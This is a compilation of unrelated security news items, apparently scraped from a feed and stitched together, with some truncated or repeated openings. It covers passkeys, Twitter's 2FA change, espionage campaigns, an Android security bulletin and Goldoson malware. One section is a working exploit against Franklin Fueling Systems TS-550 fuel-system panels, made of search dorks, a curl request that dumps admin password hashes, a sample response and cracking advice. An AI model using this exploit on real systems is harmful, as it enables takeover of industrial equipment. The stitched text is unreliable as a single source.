The transition from traditional logins to cryptographic passkeys is getting messy. But don’t worry—there’s a plan.

There was never a question that it would take years to transition the world away from passwords. The digital authentication technology, though deeply flawed, is pervasive and inveterate. Over the last five years, though, the secure-authentication industry association known as the FIDO Alliance has been making real progress promoting “passkeys,” a password-less alternative for signing into applications and websites. And yet, you probably still use a lot of passwords every day. In fact, you may not have any accounts protected by a passkey at all, despite broad adoption from Microsoft, Google, Apple, and many more.  

At the RSA security conference in San Francisco next week, Christiaan Brand, co-chair of the FIDO2 technical working group and an identity and security product manager at Google, will present a talk on new features and growth in passkey adoption. He also plans to examine the current challenges that passkeys face in countering the inertia passwords have built up over decades—and the long game of slowly grinding down the password's dominance.

“What I want to highlight is how far we’ve come, but which problems still remain unsolved,” Brand says. “Passwords are everywhere, and they are bad, but everyone is accustomed to them. Users don’t want to be surprised, and they don’t like change. So it’s very important to think about passkeys as an augmentation. We need to kind of push users toward the thing that will be easier and more secure."

Over the past year, Brand says, FIDO has made significant progress rolling out features to support its password-less vision. The infrastructure is now in place to back up passkeys so they can sync between devices, get services to prompt users about passkeys rather than always defaulting to username and password, and use Bluetooth-based proximity sensing to share passkey authentication between devices. All three of these points address major usability issues that FIDO publicly set out to improve a year ago.

In practice, though, there are still hurdles, and developing these solutions has taken time. For example, Brand says the new Bluetooth-based proximity-sensing protocol was carefully engineered to avoid the security issues that often plague Bluetooth implementations. The idea was to strip away most of Bluetooth's functionality and exclusively use the protocol for proximity checks rather than any data transfers. This approach has allowed passkeys to bypass many of Bluetooth's quirks and reliability issues when attempting to pair devices. 

Developing a coherent “user experience” (UX) for passkeys across different operating systems and web services is an ongoing challenge, though. If you, say, log into your Google account from a Mac using traditional passwords, your credentials still get checked against what Google has on file for your account on one of the company's servers. But the security and phishing-resistant benefits of passkeys come from the fact that they work differently. If you use a passkey to log into your Google account from a Mac, the cryptographic check happens locally and Apple is never directly involved—everything the user experiences during the interaction is facilitated by macOS, not Google.

“If I'm Google implementing passkeys, I cede a lot of control to Apple if my user is on an Apple device, I cede a lot of control to Microsoft if the user is on a Windows device, I cede a lot of UX control to Android and browsers,” Brand says. “So I think we’re in the technology infancy, where all of these different platforms have come up with different UX patterns and UX paradigms. Stitching all of that together is kind of tricky, and that’s probably going to take another nine to 12 months for the industry to support.”

Another big challenge with establishing consistency and continuity will be the long transition to passkeys alone. For the foreseeable future, services must continue to support username and password logins and make sure those systems are as secure and up-to-date as possible while primarily supporting the growth and evolution of passkeys. As password login systems fade from prominence and are neglected, they could produce new types of security exposures in their disrepair.

For now, though, the tech industry is still in the early stages of this long haul transition.

“Part of the problem is that all the stuff that I have in my presentation, we haven’t really seen this put into practice yet,” Brand says. “There are passkey implementations out there, and some folks have dipped their toe in the water, but a lot of the stuff isn’t really in the mainstream consciousness of developers, and certainly not for users. The mass, super-scale adoption is still something that we’re working to make happen.”

The War on Passwords Enters a Chaotic New Phase

Overcoming the limitations of consumer MFA with a new flavor of passwordless.

Twitter recently disabled SMS-based two-factor authentication (2FA) except for Twitter Blue subscribers. While the intended results may be cost-savings and boosting the number of subscribers, the decision is likely to have unintended security consequences. Even some tech-savvy people who know and care about security find Twitter's 2FA alternatives awkward enough to delay until they are forced into it, so Twitter's new policy will likely result in fewer accounts using 2FA. Educating users about how to set up authenticator apps and security keys is one solution. But that's analogous to building a faster horse.

Fundamentally, the enterprise 2FA playbook cannot be applied to consumer scenarios in equal measure because consumers can vote with their feet. Any added step will send them galloping into the arms of the competition. Thus, the Twitter news should be a call for disruption, and for solutions that protect consumer identities without introducing friction. I believe that technology is passkeys when available uniformly across the digital landscape.

**The State of Consumer MFA**

It’s broadly accepted that any multifactor authentication (MFA) is better than no MFA (I’ll use MFA here to mean authenticating your identity with two or more factors). MFA solutions prevent bad actors from accessing resources using only a victim's primary credentials. Our CISO once observed that MFA and adaptive authentication would have prevented 95% of the breaches she has seen.

But not all MFA is created equal. Some factors are weaker than others, particularly against targeted attacks. Security questions, SMS, voice, and email-based one-time passwords are considered low-assurance factors. All these factors are vulnerable to phishing. Attackers can bypass weaker factors by "guessing" the authenticator code; intercepting the code-containing SMS; or creating "alert fatigue" by bombarding the user with messages until they complete the MFA challenge.

**MFA Bypass Attacks**

Recent research found more than 113 million MFA bypass (registration required) attempts against consumer and SaaS applications over a 90-day period, representing the highest baseline level of attacks of any year on record. Given what we know about weaker factors, you'd be forgiven for thinking Twitter's decision to disable text-based authentication is a good one. But as with most things in identity, there is more complexity that meets the eye, particularly when we look at MFA adoption issues.

**The Trouble With MFA Adoption**

The challenge of getting users to sign up for any form of MFA lies in the technology's origin story. Passwords predate modern online services by thousands of years (just think about "Open, Sesame" in "Ali Baba and the 40 Thieves"). Two-factor authentication entered the picture much later as a way for enterprises and governments to protect their internal systems with something you know (password) and something you have (device, code, or security key).

Technologies developed in an enterprise context have historically prioritized security. The administrator has the power to enforce security measures across the employee base to protect the company's interests. When organizations try to use the same playbook with consumers, they fail, because consumers can vote with their feet. And the impact can quickly become existential.

So, what about authenticator apps? For us in the industry, this might look like the obvious technical alternative to SMS-based methods. But few end users are this digitally savvy. The more likely result of forcing something like an authenticator app or security key at scale is that people just won't use it.

**Phishing-Resistant Authentication**

The transition to phishing-resistant factors offers one potential solution to consumer MFA woes. FIDO and WebAuthn rely on public key cryptography and biometrics to significantly improve both security and the user experience. When using public key cryptography, there are no codes or secrets to be stolen. Users go through a biometric check on their device to unlock access to their private key, which is way faster than entering an SMS code. There are nuances in how biometric data is validated that can make a big difference for data privacy and security.

**The Passkeys Opportunity**

Despite exciting progress toward more secure and usable factors, the best MFA mechanism for consumers really isn't MFA at all — it's passkeys. Passkeys are a FIDO authenticator with the advantage of being backed up to the cloud, so if you lose your device or buy a new one, all you must do is sign into your iCloud or Google Play account to recover your passkeys. Passkeys use public key cryptography and device biometrics, making them resistant to many known attacks, and are easy for the user.

Should passkeys have been used on Twitter? Absolutely, but they may not have been a clear option at the time. Supporting something new is always expensive from the engineering perspective. If passkeys had been an option, the experience for the user might have looked something like this:

1.  The user signs into Twitter on their mobile device with username and password;
2.  They are asked if they would like to use a passkey to authenticate next time; and
3.  The user receives a biometric prompt from then on without needing to install anything. They can even go to their Mac and open Twitter in Safari, and the passkey will be automatically synced to that device.

Offering passkey authentication currently requires some reworking, but it's easier and more cost-effective than SMS. Unfortunately, passkeys are not yet uniformly distributed. Apple added support early on, followed by Android and Chrome. Windows currently supports passkeys on a single device.

Whenever you're asking people to change, you need to take concrete steps to make the transition easier. In the case of Twitter, that would be explaining to users what they can do to change their second factor, to avoid them dropping MFA entirely. This would be an amazing passkey adoption opportunity if the industry were ready. We're already in a fantastic position to encourage people to use this flavor of passwordless. What comes next is making it easier for developers to implement the necessary changes in their apps and websites. A future with fewer passwords may not be so far away after all.

Twitter's 2FA Policy Is a Call for Passkey Disruption

Franklin Fueling Systems TS-550 suffers from a password hash disclosure vulnerability.

# Exploit Title: Franklin Fueling Systems TS-550 - Default Password  
# Date: 4/16/2023  
# Exploit Author: parsa rezaie khiabanloo  
# Vendor Homepage: Franklin Fueling Systems (http://www.franklinfueling.com/)  
# Version: TS-550  
# Tested on: Linux/Android(termux)

Step 1 : attacker can using these dorks and access to find the panel

inurl:"relay_status.html"

inurl:"fms_compliance.html"

inurl:"fms_alarms.html"

inurl:"system_status.html"

inurl:"system_reports.html'

inurl:"tank_status.html"

inurl:"sensor_status.html"

inurl:"tank_control.html"

inurl:"fms_reports.html"

inurl:"correction_table.html"

Step 2 : attacker can send request 

curl -H "Content-Type:text/xml" --data '<TSA_REQUEST_LIST><TSA_REQUEST COMMAND="cmdWebGetConfiguration"/></TSA_REQUEST_LIST>' http://IP:10001/cgi-bin/tsaws.cgi

Step 3 : if get response that show like this 

<TSA_RESPONSE_LIST VERSION="2.0.0.6833" TIME_STAMP="2013-02-19T22:09:22Z" TIME_STAMP_LOCAL="2013-02-19T17:09:22" KEY="11111111" ROLE="roleGuest"><TSA_RESPONSE COMMAND="cmdWebGetConfiguration"><CONFIGURATION>  
    <DEBUGGING LOGGING_ENABLED="false" LOGGING_PATH="/tmp"/>  
    <ROLE_LIST>  
        <ROLE NAME="roleAdmin" PASSWORD="YrKMc2T2BuGvQ"/>  
        <ROLE NAME="roleUser" PASSWORD="2wd2DlEKUPTr2"/>  
        <ROLE NAME="roleGuest" PASSWORD="YXFCsq2GXFQV2"/>  
    </ROLE_LIST>

Step 4 : attacker can crack the hashesh using john the ripper 

notice : most of the panels password is : admin

Disclaimer:  
The information provided in this advisory is provided "as is" without  
warranty of any kind. Trustwave disclaims all warranties, either express or  
implied, including the warranties of merchantability and fitness for a  
particular purpose. In no event shall Trustwave or its suppliers be liable  
for any damages whatsoever including direct, indirect, incidental,  
consequential, loss of business profits or special damages, even if  
Trustwave or its suppliers have been advised of the possibility of such  
damages. Some states do not allow the exclusion or limitation of liability  
for consequential or incidental damages so the foregoing limitation may not  
apply.

Franklin Fueling Systems TS-550 Hash Disclosure / Default Credentials

Telecommunication services providers in Africa are the target of a new campaign orchestrated by a China-linked threat actor at least since November 2022.
The intrusions have been pinned on a hacking crew tracked by Symantec as Daggerfly, and which is also tracked by the broader cybersecurity community as Bronze Highland and Evasive Panda.
The campaign makes use of "previously unseen plugins from

Telecommunication services providers in Africa are the target of a new campaign orchestrated by a China-linked threat actor at least since November 2022.

The intrusions have been pinned on a hacking crew tracked by Symantec as **Daggerfly**, and which is also tracked by the broader cybersecurity community as Bronze Highland and Evasive Panda.

The campaign makes use of "previously unseen plugins from the MgBot malware framework," the cybersecurity company said in a report shared with The Hacker News. "The attackers were also seen using a PlugX loader and abusing the legitimate AnyDesk remote desktop software."

Daggerfly's use of the MgBot loader (aka BLame or MgmBot) was spotlighted by Malwarebytes in July 2020 as part of phishing attacks aimed at Indian government personnel and individuals in Hong Kong.

According to Secureworks, the threat actor uses spear-phishing as an initial infection vector to drop MgBot as well as other tools like Cobalt Strike and an Android remote access trojan (RAT) named KsRemote.

The group is suspected to conduct espionage activities against domestic human rights and pro-democracy advocates and nations neighboring China as far back as 2014.

Attack chains analyzed by Symantec show the use of living-off-the-land (LotL) tools like BITSAdmin and PowerShell to deliver next-stage payloads, including a legitimate AnyDesk executable and a credential harvesting utility.

The threat actor subsequently moves to set up persistence on the victim system by creating a local account and deploys the MgBot modular framework, which comes with a wide range of plugins to harvest browser data, log keystrokes, capture screenshots, record audio, and enumerate the Active Directory service.

UPCOMING WEBINAR

Defend with Deception: Advancing Zero Trust Security

Discover how Deception can detect advanced threats, stop lateral movement, and enhance your Zero Trust strategy. Join our insightful webinar!

Save My Seat!

"All of these capabilities would have allowed the attackers to collect a significant amount of information from victim machines," Symantec said. "The capabilities of these plugins also show that the main goal of the attackers during this campaign was information-gathering."

The all-encompassing nature of MgBot indicates that it's actively maintained and updated by the operators to obtain access to victim environments.

The disclosure arrives almost a month after SentinelOne detailed a campaign called Tainted Love in Q1 2023 aimed at telecommunication providers in the Middle East. It was attributed to a Chinese cyberespionage group that shares overlaps with Gallium (aka Othorene).

Symantec further said it identified three additional victims of the same activity cluster that are located in Asia and Africa. Two of the victims, which were breached in November 2022, are subsidiaries of a telecom firm in the Middle East region.

"Telecoms companies will always be a key target in intelligence gathering campaigns due to the access they can potentially provide to the communications of end-users," Symantec said.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Daggerfly Cyberattack Campaign Hits African Telecom Services Providers

In inflate of inflate.c, there is a possible out of bounds write due to a heap buffer overflow. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-12 Android-12L Android-13Android ID: A-242544249

_Published April 3, 2023 | Updated April 11, 2023_

The Android Security Bulletin contains details of security vulnerabilities affecting Android devices. Security patch levels of 2023-04-05 or later address all of these issues. To learn how to check a device's security patch level, see Check and update your Android version.

Android partners are notified of all issues at least a month before publication. Source code patches for these issues have been released to the Android Open Source Project (AOSP) repository and linked from this bulletin. This bulletin also includes links to patches outside of AOSP.

The most severe of these issues is a critical security vulnerability in the System component that could lead to remote (proximal/adjacent) code execution with no additional execution privileges needed. User interaction is not needed for exploitation. The severity assessment is based on the effect that exploiting the vulnerability would possibly have on an affected device, assuming the platform and service mitigations are turned off for development purposes or if successfully bypassed.

Refer to the Android and Google Play Protect mitigations section for details on the Android security platform protections and Google Play Protect, which improve the security of the Android platform.

**Android and Google service mitigations**

This is a summary of the mitigations provided by the Android security platform and service protections such as Google Play Protect. These capabilities reduce the likelihood that security vulnerabilities could be successfully exploited on Android.

*   Exploitation for many issues on Android is made more difficult by enhancements in newer versions of the Android platform. We encourage all users to update to the latest version of Android where possible.
*   The Android security team actively monitors for abuse through Google Play Protect and warns users about Potentially Harmful Applications. Google Play Protect is enabled by default on devices with Google Mobile Services, and is especially important for users who install apps from outside of Google Play.

**2023-04-01 security patch level vulnerability details**

In the sections below, we provide details for each of the security vulnerabilities that apply to the 2023-04-01 patch level. Vulnerabilities are grouped under the component they affect. Issues are described in the tables below and include CVE ID, associated references, type of vulnerability, severity, and updated AOSP versions (where applicable). When available, we link the public change that addressed the issue to the bug ID, like the AOSP change list. When multiple changes relate to a single bug, additional references are linked to numbers following the bug ID. Devices with Android 10 and later may receive security updates as well as Google Play system updates.

**Framework**

The most severe vulnerability in this section could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.

    

CVE

References

Type

Severity

Updated AOSP versions

CVE-2023-21081

A-230492955

EoP

High

11, 12, 12L, 13

CVE-2023-21088

A-235823542

EoP

High

12, 12L, 13

CVE-2023-21089

A-237766679

EoP

High

11, 12, 12L, 13

CVE-2023-21092

A-242040055

EoP

High

11, 12, 12L, 13

CVE-2023-21094

A-248031255

EoP

High

11, 12, 12L, 13

CVE-2023-21097

A-261858325

EoP

High

11, 12, 12L, 13

CVE-2023-21098

A-260567867

EoP

High

11, 12, 12L, 13

CVE-2023-21087

A-261723753

DoS

High

11, 12, 12L, 13

CVE-2023-21090

A-259942609

DoS

High

13

CVE-2023-20950

A-195756028

EoP

Moderate

11, 12, 12L

**System**

The most severe vulnerability in this section could lead to remote (proximal/adjacent) code execution with no additional execution privileges needed. User interaction is not needed for exploitation.

    

CVE

References

Type

Severity

Updated AOSP versions

CVE-2023-21085

A-264879662

RCE

Critical

11, 12, 12L, 13

CVE-2023-21096

A-254774758 \[2\] \[3\]

RCE

Critical

12, 12L, 13

CVE-2022-20463

A-231985227

EoP

High

11, 12, 12L, 13

CVE-2023-20967

A-225879503

EoP

High

11, 12, 12L, 13

CVE-2023-21084

A-262892300 \[2\]

EoP

High

13

CVE-2023-21086

A-238298970

EoP

High

11, 12, 12L, 13

CVE-2023-21093

A-228450832

EoP

High

11, 12, 12L, 13

CVE-2023-21099

A-243377226

EoP

High

11, 12, 12L, 13

CVE-2023-21100

A-242544249

EoP

High

12, 12L, 13

CVE-2022-20471

A-238177877 \[2\] \[3\]

ID

High

11, 12, 12L, 13

CVE-2023-20909

A-243130512 \[2\] \[3\]

ID

High

11, 12, 12L, 13

CVE-2023-20935

A-256589724 \[2\]

ID

High

11, 12, 12L, 13

CVE-2023-21080

A-245916076

ID

High

11, 12, 12L, 13

CVE-2023-21082

A-257030107

ID

High

11, 12, 12L, 13

CVE-2023-21083

A-252762941

ID

High

11, 12, 12L, 13

CVE-2023-21091

A-257954050

DoS

High

13

**Google Play system updates**

The following issues are included in Project Mainline components.

 

Subcomponent

CVE

MediaProvider

CVE-2023-21093

WiFi

CVE-2022-20463

**2023-04-05 security patch level vulnerability details**

In the sections below, we provide details for each of the security vulnerabilities that apply to the 2023-04-05 patch level. Vulnerabilities are grouped under the component they affect. Issues are described in the tables below and include CVE ID, associated references, type of vulnerability, severity, and updated AOSP versions (where applicable). When available, we link the public change that addressed the issue to the bug ID, like the AOSP change list. When multiple changes relate to a single bug, additional references are linked to numbers following the bug ID.

**Kernel**

The most severe vulnerability in this section could lead to local escalation of privilege in the kernel with no additional execution privileges needed. User interaction is not needed for exploitation.

    

CVE

References

Type

Severity

Subcomponent

CVE-2022-4696

A-264692298  
Upstream kernel \[2\]

EoP

High

io\_uring

CVE-2023-20941

A-264029575  
Upstream kernel

EoP

High

USB

**Arm components**

These vulnerabilities affect Arm components and further details are available directly from Arm. The severity assessment of these issues is provided directly by Arm.

   

CVE

References

Severity

Subcomponent

CVE-2022-33917

A-259984559\*

High

Mali

CVE-2022-36449

A-259983537\*

High

Mali

CVE-2022-38181

A-259695958\*

High

Mali

CVE-2022-41757

A-254445909\*

High

Mali

CVE-2022-42716

A-260148146\*

High

Mali

**Imagination Technologies**

These vulnerabilities affect Imagination Technologies components and further details are available directly from Imagination Technologies. The severity assessment of these issues is provided directly by Imagination Technologies.

   

CVE

References

Severity

Subcomponent

CVE-2021-0872

A-270401229\*

High

PowerVR-GPU

CVE-2021-0873

A-270392711\*

High

PowerVR-GPU

CVE-2021-0874

A-270399633\*

High

PowerVR-GPU

CVE-2021-0875

A-270400061\*

High

PowerVR-GPU

CVE-2021-0876

A-270400229\*

High

PowerVR-GPU

CVE-2021-0878

A-270399153\*

High

PowerVR-GPU

CVE-2021-0879

A-270397970\*

High

PowerVR-GPU

CVE-2021-0880

A-270396792\*

High

PowerVR-GPU

CVE-2021-0881

A-270396350\*

High

PowerVR-GPU

CVE-2021-0882

A-270395803\*

High

PowerVR-GPU

CVE-2021-0883

A-270395013\*

High

PowerVR-GPU

CVE-2021-0884

A-270393454\*

High

PowerVR-GPU

CVE-2021-0885

A-270401914\*

High

PowerVR-GPU

**MediaTek components**

These vulnerabilities affect MediaTek components and further details are available directly from MediaTek. The severity assessment of these issues is provided directly by MediaTek.

   

CVE

References

Severity

Subcomponent

CVE-2022-32599

A-267957662  
M-ALPS07460390\*

High

rpmb

CVE-2023-20652

A-267959360  
M-ALPS07628168 \*

High

keyinstall

CVE-2023-20653

A-267959361  
M-ALPS07628168\*

High

keyinstall

CVE-2023-20654

A-267955234  
M-ALPS07628168\*

High

keyinstall

CVE-2023-20655

A-267959364  
M-ALPS07203022\*

High

mmsdk

CVE-2023-20656

A-267957665  
M-ALPS07571494\*

High

geniezone

CVE-2023-20657

A-267955236  
M-ALPS07571485 \*

High

mtee

**Unisoc components**

These vulnerabilities affect Unisoc components and further details are available directly from Unisoc. The severity assessment of these issues is provided directly by Unisoc.

   

CVE

References

Severity

Subcomponent

CVE-2022-47335

A-268377608  
U-2073898 \*

High

Android

CVE-2022-47338

A-268412170  
U-2066670\*

High

Android

CVE-2022-47336

A-268377609  
U-2073898\*

High

Android

CVE-2022-47337

A-268410193  
U-2100732\*

High

Firmware

**Qualcomm components**

This vulnerability affects Qualcomm components and are described in further detail in the appropriate Qualcomm security bulletin or security alert. The severity assessment of this issue is provided directly by Qualcomm.

   

CVE

References

Severity

Subcomponent

CVE-2022-40503

A-258057241  
QC-CR#3237187 \[2\]

High

Bluetooth

**Qualcomm closed-source components**

These vulnerabilities affect Qualcomm closed-source components and are described in further detail in the appropriate Qualcomm security bulletin or security alert. The severity assessment of these issues is provided directly by Qualcomm.

   

CVE

References

Severity

Subcomponent

CVE-2022-33231

A-250627388\*

Critical

Closed-source component

CVE-2022-33288

A-250627565\*

Critical

Closed-source component

CVE-2022-33289

A-250627430\*

Critical

Closed-source component

CVE-2022-33302

A-250627485\*

Critical

Closed-source component

CVE-2022-33269

A-250627391\*

High

Closed-source component

CVE-2022-33270

A-250627431\*

High

Closed-source component

CVE-2022-40532

A-264417883\*

High

Closed-source component

CVE-2023-21630

A-264417203\*

High

Closed-source component

**Common questions and answers**

This section answers common questions that may occur after reading this bulletin.

**1\. How do I determine if my device is updated to address these issues?**

To learn how to check a device's security patch level, see Check and update your Android version.

*   Security patch levels of 2023-04-01 or later address all issues associated with the 2023-04-01 security patch level.
*   Security patch levels of 2023-04-05 or later address all issues associated with the 2023-04-05 security patch level and all previous patch levels.

Device manufacturers that include these updates should set the patch string level to:

*   \[ro.build.version.security\_patch\]:\[2023-04-01\]
*   \[ro.build.version.security\_patch\]:\[2023-04-05\]

For some devices on Android 10 or later, the Google Play system update will have a date string that matches the 2023-04-01 security patch level. Please see this article for more details on how to install security updates.

**2\. Why does this bulletin have two security patch levels?**

This bulletin has two security patch levels so that Android partners have the flexibility to fix a subset of vulnerabilities that are similar across all Android devices more quickly. Android partners are encouraged to fix all issues in this bulletin and use the latest security patch level.

*   Devices that use the 2023-04-01 security patch level must include all issues associated with that security patch level, as well as fixes for all issues reported in previous security bulletins.
*   Devices that use the security patch level of 2023-04-05 or newer must include all applicable patches in this (and previous) security bulletins.

Partners are encouraged to bundle the fixes for all issues they are addressing in a single update.

**3\. What do the entries in the _Type_ column mean?**

Entries in the _Type_ column of the vulnerability details table reference the classification of the security vulnerability.

 

Abbreviation

Definition

RCE

Remote code execution

EoP

Elevation of privilege

ID

Information disclosure

DoS

Denial of service

N/A

Classification not available

**4\. What do the entries in the _References_ column mean?**

Entries under the _References_ column of the vulnerability details table may contain a prefix identifying the organization to which the reference value belongs.

 

Prefix

Reference

A-

Android bug ID

QC-

Qualcomm reference number

M-

MediaTek reference number

N-

NVIDIA reference number

B-

Broadcom reference number

U-

UNISOC reference number

**5\. What does an \* next to the Android bug ID in the _References_ column mean?**

Issues that are not publicly available have an \* next to the corresponding reference ID. The update for that issue is generally contained in the latest binary drivers for Pixel devices available from the Google Developer site.

**6\. Why are security vulnerabilities split between this bulletin and device / partner security bulletins, such as the Pixel bulletin?**

Security vulnerabilities that are documented in this security bulletin are required to declare the latest security patch level on Android devices. Additional security vulnerabilities that are documented in the device / partner security bulletins are not required for declaring a security patch level. Android device and chipset manufacturers may also publish security vulnerability details specific to their products, such as Google, Huawei, LGE, Motorola, Nokia, or Samsung.

**Versions**

  

Version

Date

Notes

1.0

April 3, 2023

Bulletin Published

1.1

April 11, 2023

Bulletin revised to include AOSP links

CVE-2023-21100: Android Security Bulletin—April 2023

Code Sector TeraCopy 3.9.7 does not perform proper access validation on the source folder during a copy operation. This leads to Arbitrary File Read by allowing any user to copy any directory in the system to a directory they control.

CVE-2023-29586: CWE - CWE-285: Improper Authorization (4.10)

The Pakistan-based advanced persistent threat (APT) actor known as Transparent Tribe used a two-factor authentication (2FA) tool used by Indian government agencies as a ruse to deliver a new Linux backdoor called Poseidon.
"Poseidon is a second-stage payload malware associated with Transparent Tribe," Uptycs security researcher Tejaswini Sandapolla said in a technical report published this week.

The Pakistan-based advanced persistent threat (APT) actor known as **Transparent Tribe** used a two-factor authentication (2FA) tool used by Indian government agencies as a ruse to deliver a new Linux backdoor called Poseidon.

"Poseidon is a second-stage payload malware associated with Transparent Tribe," Uptycs security researcher Tejaswini Sandapolla said in a technical report published this week.

"It is a general-purpose backdoor that provides attackers with a wide range of capabilities to hijack an infected host. Its functionalities include logging keystrokes, taking screen captures, uploading and downloading files, and remotely administering the system in various ways."

Transparent Tribe is also tracked as APT36, Operation C-Major, PROJECTM, and Mythic Leopard, and has a track record of targeting Indian government organizations, military personnel, defense contractors, and educational entities.

It has also repeatedly leveraged trojanized versions of Kavach, the Indian government-mandated 2FA software, to deploy a variety of malware, such as CrimsonRAT and LimePad to harvest valuable information.

Another phishing campaign detected late last year took advantage of weaponized attachments to download malware designed to exfiltrate database files created by the Kavach app.

The latest set of attacks entail the use of a backdoored version of Kavach to target Linux users working for Indian government agencies, indicating attempts made by the threat actor to expand its attack spectrum beyond Windows and Android ecosystems.

"When a user interacts with the malicious version of Kavach, the genuine login page is displayed to distract them," Sandapolla explained. "Meanwhile, the payload is downloaded in the background, compromising the user's system."

UPCOMING WEBINAR

Master the Art of Dark Web Intelligence Gathering

Learn the art of extracting threat intelligence from the dark web – Join this expert-led webinar!

Save My Seat!

The starting point of the infections is an ELF malware sample, a compiled Python executable that's engineered to retrieve the second-stage Poseidon payload from a remote server.

The cybersecurity firm noted that the fake Kavach apps are primarily distributed through rogue websites that are disguised as legitimate Indian government sites. This includes www.ksboard\[.\]in and www.rodra\[.\]in.

With social engineering being the primary attack vector used by Transparent Tribe, users working within the Indian government are advised to double-check URLs received in emails before opening them.

"Repercussions of this APT36 attack could be significant, leading to loss of sensitive information, compromised systems, financial losses, and reputational damage," Sandapolla said.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Pakistani Hackers Use Linux Malware Poseidon to Target Indian Government Agencies

Categories: Business
IT security on the go.



(Read more...)




The post Introducing the Malwarebytes Admin app: Endpoint security at your fingertips appeared first on Malwarebytes Labs.

If you’re on the beach sipping piña coladas, the last thing you probably want to do is rush to your desktop and address a critical security issue.

And yet, this is the reality for many IT security professionals today. Regardless of the time or current location, security pros are expected to drop everything at a moment's notice and swoop in to save the day.

But being tethered to a desktop workstation can blur the boundaries between work and personal life. This inflexibility not only leads to additional stress and pressure on IT professionals, but also can delay response times as they scramble back to their workstation to put out fires. Even just taking a break is hard without the fear of leaving the system unattended.

Enter the Malwarebytes Admin app.

Designed as a companion to the Nebula console, the mobile app now allows administrators to manage alerts and perform essential tasks right from their iOS devices. No more being tied to a computer–you can now handle incidents and execute administrative functions wherever you are.

So sit back, relax, and enjoy an interrupted piña colada as we will delve into the key features of the Malwarebytes Admin App.

**Getting started: Setting up the Malwarebytes Admin app**

1.  Download the Malwarebytes Admin app from the App Store. It is available for free for all Nebula users.
2.  Log in with your Nebula console credentials. The app is accessible to users with admin or read-only privileges on the Nebula console.

**‎NOTE:** Malwarebytes Admin is an enterprise solution intended for IT admins. Malwarebytes Admin will not operate on your device without the required license for Nebula.

**Navigating the app: Dashboard and features**

Once logged in, the first screen you will see is the Dashboard.

Here, you can quickly assess the protection status of all endpoints, view detections by type, and view your license usage.

**Managing endpoints: Endpoint list and actions**

The Endpoint List displays all the endpoints you are managing.

The badges let you know which endpoints need immediate attention. The list can be filtered by status, OS, OS version, group, or policy, and you can search for specific endpoint names.

Selecting the "**Actions**" button lets you take various actions on the chosen endpoints, such as scanning, isolating, updating agents, checking for updates, and remediating endpoints.

**Viewing endpoint information**

Tapping on a specific endpoint allows you to view its general information, such as host, location, operating system, and network interfaces.

**Adding users**

With the Malwarebytes Admin app, you can add new users to the console by sending email invitations. You can assign roles (Super Admin, Admin, Read-only), add users to existing groups, delete users, resend invites, and edit user roles or group membership.

**Future developments**

While the Malwarebytes Admin app currently offers a wide range of features, there are some functionalities reserved for future updates. For example, while the app is **only available for iOS right now, an Android app will be coming out soon**. Additional features include detailed information on detections, push notifications on alerts, and more.

**A game changer for IT security professionals**

There’s no question that having to be attached to a desktop when managing threats and challenges faced by IT security professionals can exacerbate the stress they experience daily. That’s why we released the Malwarebytes Admin app, a game-changer for endpoint security management.

No more having to make a beeline out of the bathtub to resolve critical alerts. Receive instant notifications on your phone and quickly review, investigate, and resolve issues in just a few taps.

Download the app today and experience the convenience of having the power of Nebula right in your pocket!

**GET THE MALWAREBYTES ADMIN APP**

Introducing the Malwarebytes Admin app: Endpoint security at your fingertips

By Deeba Ahmed
The malware was identified by cybersecurity researchers at McAfee.
This is a post from HackRead.com Read the original post: Goldoson Android Malware Found in 60 Apps with 100M Downloads

****Goldson malware can collect data from apps installed on the device, as well as from Bluetooth- and Wi-Fi-connected devices.****

McAfee’s Mobile Research Team researchers discovered at least 60 malicious apps on Google Play Store infected with Android malware Goldoson. Collectively, these apps account for around 100 million installs on the Play Store and 8 million installs on the South Korean ONE Store. South Korean users are most vulnerable to downloading these apps.

**Goldoson Infiltrates Legit Apps on Play Store**

Researchers found that Goldoson Android malware has infiltrated the official Google Play Store via 60 legitimate apps. The malware component is based on a third-party library that all sixty apps use. Researchers assume that the developers mistakenly added it to the apps.

**Which Apps Are Infected with Goldoson?**

Some of the infected apps include the following:

Pikicast
GOM Player
LIVE Score
Infinite Slice
Real-Time Score
L.POINT with L.PAY
Swipe Brick Breaker
Bounce Brick Breaker
LOTTE WORLD Magicpass
Compass 9: Smart Compass
Korea Subway Info: Metroid
SomNote - Beautiful note app
GOM Audio - Music, Sync lyrics
Money Manager Expense & Budget

**How Does The Device Gets Infected?**

The Goldoson Android malware is designed to perform malicious actions on devices that download one of the 60 infected apps. Once the app is downloaded and launched, the malware library registers the app and receives its configuration from a remote server with an obfuscated domain.

This configuration sets the functions that the malware will run on the device, including ad-clicking and data-gathering features. The data collection function is activated every two days, and the collected data, along with the MAC address of connected Bluetooth and Wi-Fi devices, is transferred to a C2 server.

The ad-clicking feature is launched by loading and injecting HTML code into a hidden, customized WebView. This feature generates revenue through multiple URL visits. Overall, the Goldoson malware has been found in 60 different apps and has impacted a large number of downloads.

**What is Goldoson Malware Capable of?**

Goldson malware can collect data from apps installed on the device, as well as from Bluetooth- and Wi-Fi-connected devices. In addition, it can track users’ location and carry out ad fraud by clicking on ads in the background without alerting the user. Data collection relies on permissions given to an infected app when being installed. 

In a blog post, McAfee researchers stated that although Android 11 and above versions are generally considered safe against data theft due to their superior security protections, in 10% of the infected apps, Goldoson could collect sensitive data from devices running these versions.

McAfee responsibly alerted Google and the app developers, who promptly removed the malicious library from the apps. Apps in which they couldn’t remove the library were taken off the Play Store.

It is worth noting that malicious versions of these apps will still be available on third-party Android app stores even though on Play Store these apps will become safe with an update. Therefore, uninstall the app, and reinstall it from Play Store to be safe.

1.  Russian Android Spyware Tracks GPS Location
2.  Play Store Apps Drop Android Malware to Millions
3.  BRATA malware steals funds, factory resets phones

Goldoson Android Malware Found in 60 Apps with 100M Downloads

Malware that can steal data, track location, and perform click fraud was inadvertently built into apps via an infected third-party library, highlighting supply chain risk.

Malware that can steal data and commit click fraud has hitched a ride into 60 mobile apps, via an infected third-party library. The infected apps have logged more than 100 million downloads from the official Google Play store and are available in other app stores in South Korea, researchers have found.

